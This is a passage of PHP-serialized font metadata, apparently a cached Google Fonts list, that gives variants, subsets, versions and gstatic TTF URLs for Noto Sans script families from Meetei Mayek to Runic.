tdClass\":8:{s:6:\"family\";s:22:\"Noto Sans Meetei Mayek\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:12:\"meetei-mayek\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1TJ__TW5PgeFYVa.ttf\";s:3:\"200\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1RJ_vTW5PgeFYVa.ttf\";s:3:\"300\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1SX_vTW5PgeFYVa.ttf\";s:7:\"regular\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1TJ_vTW5PgeFYVa.ttf\";s:3:\"500\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1T7_vTW5PgeFYVa.ttf\";s:3:\"600\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1QX-fTW5PgeFYVa.ttf\";s:3:\"700\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1Qu-fTW5PgeFYVa.ttf\";s:3:\"800\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1RJ-fTW5PgeFYVa.ttf\";s:3:\"900\";s:119:\"http://fonts.gstatic.com/s/notosansmeeteimayek/v10/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1Rg-fTW5PgeFYVa.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:906;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Meroitic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"meroitic\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notosansmeroitic/v16/IFS5HfRJndhE3P4b5jnZ3ITPvC6i00UDgDhTiKY9KQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:907;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans Miao\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:4:\"miao\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/notosansmiao/v15/Dxxz8jmXMW75w3OmoDXVV4zyZUjgUYVslLhx.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:908;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans Modi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:4:\"modi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/notosansmodi/v15/pe03MIySN5pO62Z5YkFyT7jeav5qWVAgVol-.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:909;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Mongolian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:9:\"mongolian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/notosansmongolian/v15/VdGCAYADGIwE0EopZx8xQfHlgEAMsrToxLsg6-av1x0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:910;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans Mono\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_FNI49rXVEQQL8Y.ttf\";s:3:\"200\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_NNJ49rXVEQQL8Y.ttf\";s:3:\"300\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_A1J49rXVEQQL8Y.ttf\";s:7:\"regular\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_FNJ49rXVEQQL8Y.ttf\";s:3:\"500\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_GFJ49rXVEQQL8Y.ttf\";s:3:\"600\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_I1O49rXVEQQL8Y.ttf\";s:3:\"700\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_LRO49rXVEQQL8Y.ttf\";s:3:\"800\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_NNO49rXVEQQL8Y.ttf\";s:3:\"900\";s:119:\"http://fonts.gstatic.com/s/notosansmono/v20/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_PpO49rXVEQQL8Y.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:911;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Noto Sans Mro\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:3:\"mro\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/notosansmro/v15/qWcsB6--pZv9TqnUQMhe9b39WDzRtjkho4M.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:912;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Multani\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"multani\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansmultani/v15/9Bty3ClF38_RfOpe1gCaZ8p30BOFO1A0pfCs5Kos.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:913;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Myanmar\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:7:\"myanmar\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:94:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZs_y1ZtY3ymOryg38hOCSdOnFq0HGS1uEapkAC3AY.ttf\";s:3:\"200\";s:95:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HE-98EwiEwLxR-r.ttf\";s:3:\"300\";s:95:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HFa9MEwiEwLxR-r.ttf\";s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZq_y1ZtY3ymOryg38hOCSdOnFq0En23OU4o1AC.ttf\";s:3:\"500\";s:95:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HEC9cEwiEwLxR-r.ttf\";s:3:\"600\";s:95:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HEu8sEwiEwLxR-r.ttf\";s:3:\"700\";s:95:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HFK88EwiEwLxR-r.ttf\";s:3:\"800\";s:95:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HFW8MEwiEwLxR-r.ttf\";s:3:\"900\";s:95:\"http://fonts.gstatic.com/s/notosansmyanmar/v19/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HFy8cEwiEwLxR-r.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:914;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans N Ko\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:3:\"nko\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/notosansnko/v17/6NUP8FqDKBaKKjnr6P8v-sxPpvVBVNmme3gf.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:915;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Nabataean\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:9:\"nabataean\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/notosansnabataean/v15/IFS4HfVJndhE3P4b5jnZ34DfsjO330dNoBJ9hK8kMK4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:916;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Noto Sans New Tai Lue\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:11:\"new-tai-lue\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/notosansnewtailue/v15/H4c5BW-Pl9DZ0Xe_nHUapt7PovLXAhAnY7wwY55O4AS32A.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:917;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans Newa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:4:\"newa\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/notosansnewa/v15/7r3fqXp6utEsO9pI4f8ok8sWg8n_qN4R5lNU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:918;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Nushu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"nushu\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosansnushu/v18/rnCw-xRQ3B7652emAbAe_Ai1IYaFWFAMArZKqQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:919;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Ogham\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"ogham\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosansogham/v15/kmKlZqk1GBDGN0mY6k5lmEmww4hrt5laQxcoCA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:920;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Ol Chiki\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:8:\"ol-chiki\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/notosansolchiki/v17/N0b92TJNOPt-eHmFZCdQbrL32r-4CvhzDzRwlxOQYuVALWk267I6gVrz5gQ.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/notosansolchiki/v17/N0b92TJNOPt-eHmFZCdQbrL32r-4CvhzDzRwlxOQYuVALVs267I6gVrz5gQ.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/notosansolchiki/v17/N0b92TJNOPt-eHmFZCdQbrL32r-4CvhzDzRwlxOQYuVALbcx67I6gVrz5gQ.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/notosansolchiki/v17/N0b92TJNOPt-eHmFZCdQbrL32r-4CvhzDzRwlxOQYuVALY4x67I6gVrz5gQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:921;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Noto Sans Old Hungarian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:13:\"old-hungarian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/notosansoldhungarian/v15/E213_cD6hP3GwCJPEUssHEM0KqLaHJXg2PiIgRfjbg5nCYXt.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:922;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Old Italic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:10:\"old-italic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/notosansolditalic/v15/TuGOUUFzXI5FBtUq5a8bh68BJxxEVam7tWlRdRhtCC4d.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:923;O:8:\"stdClass\":8:{s:6:\"family\";s:27:\"Noto Sans Old North Arabian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:17:\"old-north-arabian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:113:\"http://fonts.gstatic.com/s/notosansoldnortharabian/v15/esDF30BdNv-KYGGJpKGk2tNiMt7Jar6olZDyNdr81zBQmUo_xw4ABw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:924;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Old Permic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:10:\"old-permic\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/notosansoldpermic/v16/snf1s1q1-dF8pli1TesqcbUY4Mr-ElrwKLdXgv_dKYB5.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:925;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Noto Sans Old Persian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:11:\"old-persian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/notosansoldpersian/v15/wEOjEAbNnc5caQTFG18FHrZr9Bp6-8CmIJ_tqOlQfx9CjA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:926;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Noto Sans Old Sogdian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:11:\"old-sogdian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/notosansoldsogdian/v15/3JnjSCH90Gmq2mrzckOBBhFhdrMst48aURt7neIqM-9uyg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:927;O:8:\"stdClass\":8:{s:6:\"family\";s:27:\"Noto Sans Old South Arabian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:17:\"old-south-arabian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:113:\"http://fonts.gstatic.com/s/notosansoldsoutharabian/v15/3qT5oiOhnSyU8TNFIdhZTice3hB_HWKsEnF--0XCHiKx1OtDT9HwTA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:928;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Old Turkic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:10:\"old-turkic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/notosansoldturkic/v15/yMJNMJVya43H0SUF_WmcGEQVqoEMKDKbsE2RjEw-Vyws.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:929;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Oriya\";s:8:\"variants\";a:4:{i:0;s:3:\"100\";i:1;s:7:\"regular\";i:2;s:3:\"700\";i:3;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:5:\"oriya\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":4:{s:3:\"100\";s:89:\"http://fonts.gstatic.com/s/notosansoriya/v16/AYCRpXfzfccDCstK_hrjDyADv5efgKfHRKhxIh_G.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosansoriya/v16/AYCTpXfzfccDCstK_hrjDyADv5en5K3DZq1hIg.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/notosansoriya/v16/AYCWpXfzfccDCstK_hrjDyADv5efWILnboZ9KwbfIQ.ttf\";s:3:\"900\";s:91:\"http://fonts.gstatic.com/s/notosansoriya/v16/AYCWpXfzfccDCstK_hrjDyADv5efYIDnboZ9KwbfIQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:930;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Osage\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"osage\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosansosage/v15/oPWX_kB6kP4jCuhpgEGmw4mtAVtXRlaSxkrMCQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:931;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Osmanya\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"osmanya\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansosmanya/v15/8vIS7xs32H97qzQKnzfeWzUyUpOJmz6kR47NCV5Z.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:932;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Noto Sans Pahawh Hmong\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:12:\"pahawh-hmong\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/notosanspahawhhmong/v15/bWtp7e_KfBziStx7lIzKKaMUOBEA3UPQDW7krzc_c48aMpM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:933;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Palmyrene\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:9:\"palmyrene\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/notosanspalmyrene/v15/ZgNPjOdKPa7CHqq0h37c_ASCWvH93SFCPnK5ZpdNtcA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:934;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Noto Sans Pau Cin Hau\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:11:\"pau-cin-hau\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/notosanspaucinhau/v16/x3d-cl3IZKmUqiMg_9wBLLtzl22EayN7ehIdjEWqKMxsKw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:935;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Phags Pa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"phags-pa\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/notosansphagspa/v15/pxiZyoo6v8ZYyWh5WuPeJzMkd4SrGChkqkSsrvNXiA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:936;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Phoenician\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:10:\"phoenician\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/notosansphoenician/v15/jizFRF9Ksm4Bt9PvcTaEkIHiTVtxmFtS5X7Jot-p5561.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:937;O:8:\"stdClass\":8:{s:6:\"family\";s:25:\"Noto Sans Psalter Pahlavi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:15:\"psalter-pahlavi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/notosanspsalterpahlavi/v15/rP2Vp3K65FkAtHfwd-eISGznYihzggmsicPfud3w1G3KsUQBct4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:938;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Rejang\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"rejang\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosansrejang/v15/Ktk2AKuMeZjqPnXgyqrib7DIogqwN4O3WYZB_sU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:939;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Runic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"runic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosansrunic/v15/H4c_BXWPl9DZ0Xe_nHUaus7W68WWaxpvHtgIYg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:940;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Noto Sans 